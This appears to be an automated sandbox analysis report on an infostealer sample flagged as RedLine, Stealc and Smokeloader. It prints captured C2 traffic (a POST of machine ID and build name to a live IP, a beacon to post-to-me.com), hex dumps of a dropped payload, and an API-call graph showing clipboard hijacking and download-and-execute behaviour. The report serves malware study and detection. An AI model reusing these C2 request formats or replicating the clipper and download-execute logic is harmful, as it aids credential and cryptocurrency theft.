                                                          Oct 26, 2024 19:08:33.704524040 CEST1236INData Raw: 8d 4c 11 ec 51 8d 48 14 51 50 e8 8d 2f 00 00 8b 45 08 83 c4 0c ff 0d 5c a9 51 00 3b 05 e8 0a 44 00 76 04 83 6d 08 14 a1 60 a9 51 00 a3 68 a9 51 00 8b 45 08 a3 e8 0a 44 00 89 3d 70 a9 51 00 5b 5f 5e c9 c3 a1 6c a9 51 00 56 8b 35 5c a9 51 00 57 33
                                                          Data Ascii: LQHQP/E\Q;Dvm`QhQED=pQ[_^lQV5\QW3;u4kP5`QW5DC;u3xlQ5\Q`Qk5`QhAj5DCF;tjh hWCF;uvW5DCN>~\QF_^
                                                          Oct 26, 2024 19:08:33.704535007 CEST1236INData Raw: fc 33 c0 40 5f 5e 5b c9 c3 8b ff 55 8b ec 83 ec 14 a1 5c a9 51 00 8b 4d 08 6b c0 14 03 05 60 a9 51 00 83 c1 17 83 e1 f0 89 4d f0 c1 f9 04 53 49 83 f9 20 56 57 7d 0b 83 ce ff d3 ee 83 4d f8 ff eb 0d 83 c1 e0 83 ca ff 33 f6 d3 ea 89 55 f8 8b 0d 68
                                                          Data Ascii: 3@_^[U\QMk`QMSI VW}M3UhQS;#U#u];r;u`QS;#U#u];r;u[{u];r;u1`Q{u];r;u]u3S:YKC8t
                                                          Oct 26, 2024 19:08:33.704555035 CEST1236INData Raw: f0 43 00 57 8b cb e8 8d 2a 00 00 e9 1c ff ff ff 8b ff 55 8b ec 33 c0 39 45 08 6a 00 0f 94 c0 68 00 10 00 00 50 ff 15 50 c0 43 00 a3 ec 0a 44 00 85 c0 75 02 5d c3 33 c0 40 a3 54 a9 51 00 5d c3 8b ff 55 8b ec 57 bf e8 03 00 00 57 ff 15 10 c1 43 00
                                                          Data Ascii: CW*U39EjhPPCDu]3@TQ]UWWCu8C`wt_]Uu5Ch]UhC8CthCPCtu]UuYuCj@Yj]YU
                                                          Oct 26, 2024 19:08:33.704570055 CEST1236INData Raw: 83 c4 14 68 10 20 01 00 68 88 c7 43 00 57 e8 b5 29 00 00 83 c4 0c eb 32 6a f4 ff 15 7c c0 43 00 8b d8 3b de 74 24 83 fb ff 74 1f 6a 00 8d 45 f8 50 8d 34 fd ac f2 43 00 ff 36 e8 21 2c 00 00 59 50 ff 36 53 ff 15 18 c1 43 00 5f 5e 5b c9 c3 6a 03 e8
                                                          Data Ascii: h hCW)2j|C;t$tjEP4C6!,YP6SC_^[j,Ytj,Yu=Cuh)hYYUE<D]U5<DYtuYt3@]3]UVWuM#Eu3;t0;u,WWWWW
                                                          Oct 26, 2024 19:08:33.704581022 CEST1236INData Raw: 75 e4 ff d3 89 86 fc 01 00 00 89 7e 70 c6 86 c8 00 00 00 43 c6 86 4b 01 00 00 43 c7 46 68 68 f3 43 00 6a 0d e8 52 e9 ff ff 59 83 65 fc 00 ff 76 68 ff 15 18 c0 43 00 c7 45 fc fe ff ff ff e8 3e 00 00 00 6a 0c e8 31 e9 ff ff 59 89 7d fc 8b 45 0c 89
                                                          Data Ascii: u~pCKCFhhCjRYevhCE>j1Y}EFlupCFlvl(YE?3GujYjYVW4C5`CuNhjiYYt:V5`C5LDYtjVYY0CN
                                                          Oct 26, 2024 19:08:33.704592943 CEST1236INData Raw: 3b df 0f 95 c0 3b c7 75 1d e8 b6 e1 ff ff c7 00 16 00 00 00 57 57 57 57 57 e8 fc 0b 00 00 83 c4 14 83 c8 ff eb 53 83 3d 54 a9 51 00 03 75 38 6a 04 e8 71 e4 ff ff 59 89 7d fc 53 e8 9a e4 ff ff 59 89 45 e0 3b c7 74 0b 8b 73 fc 83 ee 09 89 75 e4 eb
                                                          Data Ascii: ;;uWWWWWS=TQu8jqY}SYE;tsuuE%9}uSW5D<Cg3]uj?Y-t"ttHt3VWh3FWP"3~~~~h
                                                          Oct 26, 2024 19:08:33.710000038 CEST1236INData Raw: e4 eb 2a 8a 46 01 84 c0 74 28 0f b6 3e 0f b6 c0 eb 12 8b 45 e0 8a 80 94 f7 43 00 08 44 3b 1d 0f b6 46 01 47 3b f8 76 ea 8b 7d 08 46 46 80 3e 00 75 d1 8b 75 e4 ff 45 e0 83 c6 08 83 7d e0 04 89 75 e4 72 e9 8b c7 89 7b 04 c7 43 08 01 00 00 00 e8 67
                                                          Data Ascii: *Ft(>ECD;FG;v}FF>uuE}ur{CgjCCCZf1Af0A@@JuL@;vFF~4C@IuCCSs3{95XDXM_^3[jhxC


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.54970762.204.41.177803640C:\Users\user\AppData\Local\Temp\A865.tmp.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 26, 2024 19:08:39.882617950 CEST88OUTGET / HTTP/1.1
                                                          Host: 62.204.41.177
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Oct 26, 2024 19:08:40.769423008 CEST203INHTTP/1.1 200 OK
                                                          Date: Sat, 26 Oct 2024 17:08:40 GMT
                                                          Server: Apache/2.4.52 (Ubuntu)
                                                          Content-Length: 0
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=UTF-8
                                                          Oct 26, 2024 19:08:40.774274111 CEST419OUTPOST /edd20096ecef326d.php HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----DAFHIDGIJKJKECBGDBGH
                                                          Host: 62.204.41.177
                                                          Content-Length: 219
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Data Raw: 2d 2d 2d 2d 2d 2d 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 38 33 42 42 30 34 31 46 44 42 32 34 39 36 36 31 38 36 37 35 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 39 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 48 2d 2d 0d 0a
                                                          Data Ascii: ------DAFHIDGIJKJKECBGDBGHContent-Disposition: form-data; name="hwid"B683BB041FDB2496618675------DAFHIDGIJKJKECBGDBGHContent-Disposition: form-data; name="build"default9_cap------DAFHIDGIJKJKECBGDBGH--
                                                          Oct 26, 2024 19:08:41.934814930 CEST210INHTTP/1.1 200 OK
                                                          Date: Sat, 26 Oct 2024 17:08:40 GMT
                                                          Server: Apache/2.4.52 (Ubuntu)
                                                          Content-Length: 8
                                                          Keep-Alive: timeout=5, max=99
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 59 6d 78 76 59 32 73 3d
                                                          Data Ascii: YmxvY2s=


                                                          HTTPS Proxied Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.549704172.67.179.2074437092C:\Users\user\Desktop\GK059kPZ5B.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-10-26 17:08:32 UTC90OUTGET /track_prt.php?sub=0&cc=DE HTTP/1.1
                                                          User-Agent: ShareScreen
                                                          Host: post-to-me.com
                                                          2024-10-26 17:08:32 UTC771INHTTP/1.1 200 OK
                                                          Date: Sat, 26 Oct 2024 17:08:32 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          X-Powered-By: PHP/5.4.16
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zQlUiv2jtPwlSQ%2B8ylAomKIj3BtfVTljISapDZv6Fka8BN7LQW2lew9UZXQD9Emu72zXsOCvIMYTGHB5mjG1mNAIupVu05OJMhOvsciYUVEAD1PDOQ8PI5LLsl5dHTkoBA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d8c0c85fee02e51-DFW
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1127&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=728&delivery_rate=2659320&cwnd=251&unsent_bytes=0&cid=8b4e90d6cf25d2d3&ts=547&x=0"
                                                          2024-10-26 17:08:32 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                          Data Ascii: 2ok
                                                          2024-10-26 17:08:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:13:08:25
                                                          Start date:26/10/2024
                                                          Path:C:\Users\user\Desktop\GK059kPZ5B.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\GK059kPZ5B.exe"
                                                          Imagebase:0x400000
                                                          File size:465'920 bytes
                                                          MD5 hash:9883FDABD29A18139BD1CADEDF550F35
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4555377117.0000000000869000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          Reputation:low
                                                          Has exited:false

                                                          General

                                                          Target ID:2
                                                          Start time:13:08:34
                                                          Start date:26/10/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\A865.tmp.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\AppData\Local\Temp\A865.tmp.exe"
                                                          Imagebase:0x400000
                                                          File size:402'432 bytes
                                                          MD5 hash:8107C38AF897D81AA4BFE8CE9CA8407C
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000002.00000002.3069360956.0000000000849000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.3069391688.0000000000873000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000003.2224459772.0000000002320000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Joe Sandbox ML
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:5
                                                          Start time:13:08:41
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3640 -s 1324
                                                          Imagebase:0x400000
                                                          File size:483'680 bytes
                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:2.5%
                                                            Dynamic/Decrypted Code Coverage:3.7%
                                                            Signature Coverage:5.7%
                                                            Total number of Nodes:761
                                                            Total number of Limit Nodes:21
                                                            execution_graph 65169 869005 65170 869009 65169->65170 65173 869736 65170->65173 65174 869745 65173->65174 65177 869ed6 65174->65177 65178 869ef1 65177->65178 65179 869efa CreateToolhelp32Snapshot 65178->65179 65180 869f16 Module32First 65178->65180 65179->65178 65179->65180 65181 869f25 65180->65181 65182 869735 65180->65182 65184 869b95 65181->65184 65185 869bc0 65184->65185 65186 869bd1 VirtualAlloc 65185->65186 65187 869c09 65185->65187 65186->65187 65187->65187 65188 404bb3 65189 404bbf Concurrency::details::ContextBase::CancelStealers 65188->65189 65194 40fb31 65189->65194 65193 404bdf ListArray Concurrency::details::ContextBase::CancelStealers 65196 40fb36 65194->65196 65197 404bc8 65196->65197 65199 40fb52 Concurrency::details::_RegisterConcRTEventTracing 65196->65199 65218 42ad9e 65196->65218 65225 42f470 7 API calls 2 library calls 65196->65225 65202 4051f5 65197->65202 65226 42862d RaiseException 65199->65226 65201 4103ec 65203 405201 Concurrency::details::ContextBase::CancelStealers __Cnd_init 65202->65203 65206 405219 __Mtx_init 65203->65206 65237 40ce57 28 API calls std::_Throw_Cpp_error 65203->65237 65205 405240 65229 4010ea 65205->65229 65206->65205 65238 40ce57 28 API calls std::_Throw_Cpp_error 65206->65238 65212 40528f 65213 4052a4 ListArray 65212->65213 65240 401128 30 API calls 2 library calls 65212->65240 65241 401109 65213->65241 65217 4052c9 Concurrency::details::ContextBase::CancelStealers 65217->65193 65223 4336c7 __dosmaperr 65218->65223 65219 433705 65228 42eae9 20 API calls __dosmaperr 65219->65228 65220 4336f0 RtlAllocateHeap 65222 433703 65220->65222 65220->65223 65222->65196 65223->65219 65223->65220 65227 42f470 7 API calls 2 library calls 65223->65227 65225->65196 65226->65201 65227->65223 65228->65222 65245 40d338 65229->65245 65232 401103 65234 40cf18 65232->65234 65277 42e134 65234->65277 65237->65206 65238->65205 65239 40ce57 28 API calls std::_Throw_Cpp_error 65239->65212 65240->65212 65242 401115 __Mtx_unlock 65241->65242 65243 401122 65242->65243 65609 40ce57 28 API calls std::_Throw_Cpp_error 65242->65609 65243->65217 65249 40d092 65245->65249 65248 40ce57 28 API calls std::_Throw_Cpp_error 65248->65232 65250 40d0e8 65249->65250 65251 40d0ba GetCurrentThreadId 65249->65251 65252 40d0ec GetCurrentThreadId 65250->65252 65255 40d112 65250->65255 65256 40d0c5 GetCurrentThreadId 65251->65256 65263 40d0e0 65251->65263 65262 40d0fb 65252->65262 65253 40d1ab GetCurrentThreadId 65253->65262 65254 40d202 GetCurrentThreadId 65254->65263 65255->65253 65258 40d132 65255->65258 65256->65263 65274 40e954 GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65258->65274 65261 4010f6 65261->65232 65261->65248 65262->65254 65262->65263 65267 40f8f4 65263->65267 65264 40d16a GetCurrentThreadId 65264->65262 65265 40d13d __Xtime_diff_to_millis2 65264->65265 65265->65262 65265->65263 65265->65264 65275 40e954 GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65265->65275 65268 40f8fd 65267->65268 65269 40f8ff IsProcessorFeaturePresent 65267->65269 65268->65261 65271 40f972 65269->65271 65276 40f936 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 65271->65276 65273 40fa55 65273->65261 65274->65265 65275->65265 65276->65273 65278 42e141 65277->65278 65279 42e155 65277->65279 65300 42eae9 20 API calls __dosmaperr 65278->65300 65291 42e0eb 65279->65291 65282 42e146 65301 42a5bd 26 API calls _Deallocate 65282->65301 65285 42e16a CreateThread 65286 42e189 GetLastError 65285->65286 65290 42e195 65285->65290 65329 42dfe0 65285->65329 65302 42eab3 20 API calls 2 library calls 65286->65302 65288 40527c 65288->65212 65288->65239 65303 42e05d 65290->65303 65311 434d4a 65291->65311 65295 42e104 65296 42e123 65295->65296 65297 42e10b GetModuleHandleExW 65295->65297 65298 42e05d __Thrd_start 22 API calls 65296->65298 65297->65296 65299 42e12d 65298->65299 65299->65285 65299->65290 65300->65282 65301->65288 65302->65290 65304 42e06a 65303->65304 65305 42e08e 65303->65305 65306 42e070 CloseHandle 65304->65306 65307 42e079 65304->65307 65305->65288 65306->65307 65308 42e088 65307->65308 65309 42e07f FreeLibrary 65307->65309 65310 43348a _free 20 API calls 65308->65310 65309->65308 65310->65305 65312 434d57 65311->65312 65313 434d97 65312->65313 65314 434d82 HeapAlloc 65312->65314 65318 434d6b __dosmaperr 65312->65318 65327 42eae9 20 API calls __dosmaperr 65313->65327 65315 434d95 65314->65315 65314->65318 65317 42e0fb 65315->65317 65320 43348a 65317->65320 65318->65313 65318->65314 65326 42f470 7 API calls 2 library calls 65318->65326 65321 433495 HeapFree 65320->65321 65325 4334be _free 65320->65325 65322 4334aa 65321->65322 65321->65325 65328 42eae9 20 API calls __dosmaperr 65322->65328 65324 4334b0 GetLastError 65324->65325 65325->65295 65326->65318 65327->65317 65328->65324 65330 42dfec _Atexit 65329->65330 65331 42dff3 GetLastError ExitThread 65330->65331 65332 42e000 65330->65332 65345 431efa GetLastError 65332->65345 65334 42e005 65365 435591 65334->65365 65337 42e01b 65372 401169 65337->65372 65346 431f10 65345->65346 65347 431f16 65345->65347 65380 435131 11 API calls 2 library calls 65346->65380 65349 434d4a __dosmaperr 20 API calls 65347->65349 65352 431f65 SetLastError 65347->65352 65350 431f28 65349->65350 65351 431f30 65350->65351 65381 435187 11 API calls 2 library calls 65350->65381 65354 43348a _free 20 API calls 65351->65354 65352->65334 65356 431f36 65354->65356 65355 431f45 65355->65351 65357 431f4c 65355->65357 65358 431f71 SetLastError 65356->65358 65382 431d6c 20 API calls __dosmaperr 65357->65382 65383 42df9d 167 API calls 2 library calls 65358->65383 65361 431f57 65363 43348a _free 20 API calls 65361->65363 65362 431f7d 65364 431f5e 65363->65364 65364->65352 65364->65358 65366 4355b6 65365->65366 65367 4355ac 65365->65367 65384 434eb3 5 API calls 2 library calls 65366->65384 65369 40f8f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 65367->65369 65370 42e010 65369->65370 65370->65337 65379 4354c4 10 API calls 2 library calls 65370->65379 65371 4355cd 65371->65367 65385 405825 65372->65385 65398 40155a Sleep 65372->65398 65373 401173 65376 42e1b9 65373->65376 65577 42e094 65376->65577 65378 42e1c6 65379->65337 65380->65347 65381->65355 65382->65361 65383->65362 65384->65371 65386 405831 Concurrency::details::ContextBase::CancelStealers 65385->65386 65387 4010ea std::_Cnd_initX 35 API calls 65386->65387 65388 405846 __Cnd_signal 65387->65388 65389 40585e 65388->65389 65444 40ce57 28 API calls std::_Throw_Cpp_error 65388->65444 65391 401109 std::_Cnd_initX 28 API calls 65389->65391 65392 405867 65391->65392 65400 4016e3 65392->65400 65421 402a14 InternetOpenW 65392->65421 65395 40586e ListArray Concurrency::details::ContextBase::CancelStealers 65395->65373 65399 4016d9 65398->65399 65445 40fe0b 65400->65445 65402 4016ef Sleep 65446 40cc35 65402->65446 65405 40cc35 28 API calls 65406 401715 65405->65406 65407 40171f OpenClipboard 65406->65407 65408 401947 Sleep 65407->65408 65409 40172f GetClipboardData 65407->65409 65408->65407 65410 401941 CloseClipboard 65409->65410 65411 40173f GlobalLock 65409->65411 65410->65408 65411->65410 65416 40174c _strlen 65411->65416 65412 40cbec 28 API calls std::system_error::system_error 65412->65416 65413 40cc35 28 API calls 65413->65416 65415 4018d6 EmptyClipboard GlobalAlloc 65415->65416 65417 4018ef GlobalLock 65415->65417 65416->65410 65416->65412 65416->65413 65416->65415 65450 402e8b 167 API calls 2 library calls 65416->65450 65452 40cacb 26 API calls _Deallocate 65416->65452 65451 4269b0 65417->65451 65420 401909 GlobalUnlock SetClipboardData GlobalFree 65420->65416 65422 402a47 InternetOpenUrlW 65421->65422 65423 402bbc 65421->65423 65422->65423 65424 402a5d GetTempPathW GetTempFileNameW 65422->65424 65426 40f8f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 65423->65426 65458 42a8ae 65424->65458 65428 402bcb 65426->65428 65437 40e790 65428->65437 65429 402bab InternetCloseHandle InternetCloseHandle 65429->65423 65430 402ac8 Concurrency::details::SchedulerBase::Initialize 65431 402ae0 InternetReadFile WriteFile 65430->65431 65432 402b20 CloseHandle 65430->65432 65431->65430 65460 402980 65432->65460 65435 402b4b ShellExecuteExW 65435->65429 65436 402b92 WaitForSingleObject CloseHandle 65435->65436 65436->65429 65568 40df0f 65437->65568 65442 40e835 65442->65395 65443 40e7a7 __Cnd_do_broadcast_at_thread_exit __Mtx_unlock __Cnd_broadcast 65575 40df1b LeaveCriticalSection std::_Lockit::~_Lockit 65443->65575 65444->65389 65445->65402 65447 40cc51 _strlen 65446->65447 65453 40cbec 65447->65453 65449 401708 65449->65405 65450->65416 65451->65420 65452->65416 65454 40cc1f 65453->65454 65456 40cbfb BuildCatchObjectHelperInternal 65453->65456 65457 40cb81 28 API calls 4 library calls 65454->65457 65456->65449 65457->65456 65459 402a96 CreateFileW 65458->65459 65459->65429 65459->65430 65461 4029ab _wcslen Concurrency::details::SchedulerBase::Initialize 65460->65461 65470 42b474 65461->65470 65467 4029d8 65492 404358 65467->65492 65468 40f8f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 65469 402a12 65468->65469 65469->65429 65469->65435 65496 42b126 65470->65496 65473 402843 65474 402852 Concurrency::details::ContextBase::CancelStealers 65473->65474 65522 403302 65474->65522 65476 402866 65538 403bb0 65476->65538 65478 40287a 65479 4028a8 65478->65479 65480 40288c 65478->65480 65544 403137 65479->65544 65565 4032bf 167 API calls 65480->65565 65483 4028b5 65547 403c45 65483->65547 65485 4028c7 65557 403ce7 65485->65557 65487 4028e4 65489 404358 26 API calls 65487->65489 65488 40289f std::ios_base::_Ios_base_dtor Concurrency::details::ContextBase::CancelStealers 65488->65467 65490 402903 65489->65490 65566 4032bf 167 API calls 65490->65566 65493 404360 65492->65493 65494 402a04 65492->65494 65567 40ccbb 26 API calls 2 library calls 65493->65567 65494->65468 65497 42b153 65496->65497 65498 42b157 65497->65498 65499 42b162 65497->65499 65500 42b17a 65497->65500 65504 40f8f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 65498->65504 65502 42eae9 _free 20 API calls 65499->65502 65501 42a767 __fassign 162 API calls 65500->65501 65503 42b185 65501->65503 65505 42b167 65502->65505 65508 42b327 65503->65508 65510 42b190 65503->65510 65506 4029c4 65504->65506 65507 42a5bd __Thrd_start 26 API calls 65505->65507 65506->65473 65507->65498 65509 42b354 WideCharToMultiByte 65508->65509 65511 42b332 65508->65511 65509->65511 65512 42b238 WideCharToMultiByte 65510->65512 65514 42b19b 65510->65514 65518 42b1d5 WideCharToMultiByte 65510->65518 65511->65498 65513 42eae9 _free 20 API calls 65511->65513 65512->65514 65515 42b263 65512->65515 65513->65498 65514->65498 65519 42eae9 _free 20 API calls 65514->65519 65515->65514 65517 42b26c GetLastError 65515->65517 65517->65514 65521 42b27b 65517->65521 65518->65514 65519->65498 65520 42b294 WideCharToMultiByte 65520->65511 65520->65521 65521->65498 65521->65511 65521->65520 65523 40330e Concurrency::details::ContextBase::CancelStealers 65522->65523 65524 4046a1 167 API calls 65523->65524 65525 40333a 65524->65525 65526 404872 167 API calls 65525->65526 65527 403363 65526->65527 65528 4045b1 26 API calls 65527->65528 65529 403372 65528->65529 65530 4033b7 std::ios_base::_Ios_base_dtor 65529->65530 65531 40de08 167 API calls 65529->65531 65532 40c63d 167 API calls 65530->65532 65534 4033f3 Concurrency::details::ContextBase::CancelStealers 65530->65534 65533 403387 65531->65533 65532->65534 65533->65530 65535 4045b1 26 API calls 65533->65535 65534->65476 65536 403398 65535->65536 65537 404c39 167 API calls 65536->65537 65537->65530 65539 403bbc Concurrency::details::ContextBase::CancelStealers 65538->65539 65540 4042d4 167 API calls 65539->65540 65541 403bc8 65540->65541 65542 403bec Concurrency::details::ContextBase::CancelStealers 65541->65542 65543 403520 167 API calls 65541->65543 65542->65478 65543->65542 65545 40437b 28 API calls 65544->65545 65546 403151 Concurrency::details::SchedulerBase::Initialize 65545->65546 65546->65483 65548 403c51 Concurrency::details::ContextBase::CancelStealers 65547->65548 65549 40c63d 167 API calls 65548->65549 65550 403c74 65549->65550 65551 4042d4 167 API calls 65550->65551 65552 403c7e 65551->65552 65554 403cc1 Concurrency::details::ContextBase::CancelStealers 65552->65554 65556 403520 167 API calls 65552->65556 65553 403c9f 65553->65554 65555 4046ef 167 API calls 65553->65555 65554->65485 65555->65554 65556->65553 65558 403cf3 __EH_prolog3_catch 65557->65558 65559 4042d4 167 API calls 65558->65559 65561 403d0c 65559->65561 65560 4046ef 167 API calls 65563 403d95 Concurrency::details::ContextBase::CancelStealers 65560->65563 65562 403d3c 65561->65562 65564 4036c4 40 API calls 65561->65564 65562->65560 65563->65487 65564->65562 65565->65488 65566->65488 65567->65494 65576 40f24f EnterCriticalSection 65568->65576 65570 40df19 65571 40cebe GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 65570->65571 65572 40cef7 65571->65572 65573 40ceec CloseHandle 65571->65573 65574 40cefb GetCurrentThreadId 65572->65574 65573->65574 65574->65443 65575->65442 65576->65570 65586 431f7e GetLastError 65577->65586 65579 42e0a3 ExitThread 65580 42e0c1 65583 42e0cd CloseHandle 65580->65583 65584 42e0d4 65580->65584 65583->65584 65584->65579 65585 42e0e0 FreeLibraryAndExitThread 65584->65585 65587 431f9d 65586->65587 65588 431f97 65586->65588 65590 434d4a __dosmaperr 17 API calls 65587->65590 65592 431ff4 SetLastError 65587->65592 65606 435131 11 API calls 2 library calls 65588->65606 65591 431faf 65590->65591 65593 431fb7 65591->65593 65607 435187 11 API calls 2 library calls 65591->65607 65595 42e09f 65592->65595 65596 43348a _free 17 API calls 65593->65596 65595->65579 65595->65580 65605 435516 10 API calls 2 library calls 65595->65605 65598 431fbd 65596->65598 65597 431fcc 65597->65593 65599 431fd3 65597->65599 65600 431feb SetLastError 65598->65600 65608 431d6c 20 API calls __dosmaperr 65599->65608 65600->65595 65602 431fde 65603 43348a _free 17 API calls 65602->65603 65604 431fe4 65603->65604 65604->65592 65604->65600 65605->65580 65606->65587 65607->65597 65608->65602 65609->65243 65610 402c24 InternetOpenW 65611 402e7a 65610->65611 65614 402c57 Concurrency::details::SchedulerBase::Initialize 65610->65614 65612 40f8f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 65611->65612 65613 402e89 65612->65613 65622 42df1d 65614->65622 65617 42df1d std::_Locinfo::_Locinfo_ctor 26 API calls 65618 402e3c 65617->65618 65619 42df1d std::_Locinfo::_Locinfo_ctor 26 API calls 65618->65619 65620 402e4e InternetOpenUrlW 65619->65620 65620->65611 65621 402e69 InternetCloseHandle InternetCloseHandle 65620->65621 65621->65611 65623 42df3a 65622->65623 65626 42df2c 65622->65626 65631 42eae9 20 API calls __dosmaperr 65623->65631 65625 42df44 65632 42a5bd 26 API calls _Deallocate 65625->65632 65626->65623 65629 42df6a 65626->65629 65628 402e2e 65628->65617 65629->65628 65633 42eae9 20 API calls __dosmaperr 65629->65633 65631->65625 65632->65628 65633->65625 65634 4327a5 65639 432573 65634->65639 65637 4327cd 65644 43259e 65639->65644 65641 432791 65658 42a5bd 26 API calls _Deallocate 65641->65658 65643 4326f0 65643->65637 65651 43d03c 65643->65651 65647 4326e7 65644->65647 65654 43c8ee 170 API calls 2 library calls 65644->65654 65646 432731 65646->65647 65655 43c8ee 170 API calls 2 library calls 65646->65655 65647->65643 65657 42eae9 20 API calls __dosmaperr 65647->65657 65649 432750 65649->65647 65656 43c8ee 170 API calls 2 library calls 65649->65656 65659 43ca11 65651->65659 65653 43d057 65653->65637 65654->65646 65655->65649 65656->65647 65657->65641 65658->65643 65660 43ca1d BuildCatchObjectHelperInternal 65659->65660 65661 43ca2b 65660->65661 65664 43ca64 65660->65664 65677 42eae9 20 API calls __dosmaperr 65661->65677 65663 43ca30 65678 42a5bd 26 API calls _Deallocate 65663->65678 65670 43cfeb 65664->65670 65669 43ca3a __fread_nolock 65669->65653 65680 43f961 65670->65680 65673 43ca88 65679 43cab1 LeaveCriticalSection __wsopen_s 65673->65679 65676 43348a _free 20 API calls 65676->65673 65677->65663 65678->65669 65679->65669 65681 43f984 65680->65681 65682 43f96d 65680->65682 65684 43f9a3 65681->65684 65685 43f98c 65681->65685 65751 42eae9 20 API calls __dosmaperr 65682->65751 65755 434fca 10 API calls 2 library calls 65684->65755 65753 42eae9 20 API calls __dosmaperr 65685->65753 65686 43f972 65752 42a5bd 26 API calls _Deallocate 65686->65752 65689 43f9aa MultiByteToWideChar 65692 43f9d9 65689->65692 65693 43f9c9 GetLastError 65689->65693 65691 43f991 65754 42a5bd 26 API calls _Deallocate 65691->65754 65757 4336c7 21 API calls 3 library calls 65692->65757 65756 42eab3 20 API calls 2 library calls 65693->65756 65697 43d001 65697->65673 65704 43d05c 65697->65704 65698 43f9e1 65699 43fa09 65698->65699 65700 43f9e8 MultiByteToWideChar 65698->65700 65702 43348a _free 20 API calls 65699->65702 65700->65699 